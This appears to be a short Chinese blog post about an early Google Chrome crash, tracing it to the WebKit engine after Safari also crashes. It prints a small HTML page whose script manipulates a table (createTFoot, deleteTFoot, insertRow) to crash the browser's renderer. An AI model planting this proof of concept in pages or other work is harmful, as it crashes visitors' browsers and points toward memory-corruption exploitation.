Jim的共享空间

 Google Chrome刚出安全漏洞就出来了，下面是会导致Chrome Crash的HTML源代码：

<html>
<body>
<table id="obj">
<script>
obj.createTFoot();
obj.deleteTFoot();
obj.focus();
obj.insertRow();
obj.insertRow();
</script>
</body>
</html>
因为Chrome是多进程的，因此只有新打开此页面的进程会Crash。 我的机器挂着SoftIce，看到如下界面：(EAX的值是错的！)

Chrome 是由原先的 “Google Browser” 项目发展而来，采用了 Webkit 的网页渲染引擎，还包含 Google 的 “Gears Project”。再来试试同样采用Webkit引擎的Apple Safari对这个文件的反应吧... 一样是Crash！ 原来是因为Webkit 的网页渲染引擎有问题导致的，据说这个BUG去年已经发现了，看来Webkit工作 重心全在速度上了（Chrome速度确实很快），安全问题还没有完全重视起来。继续加油吧！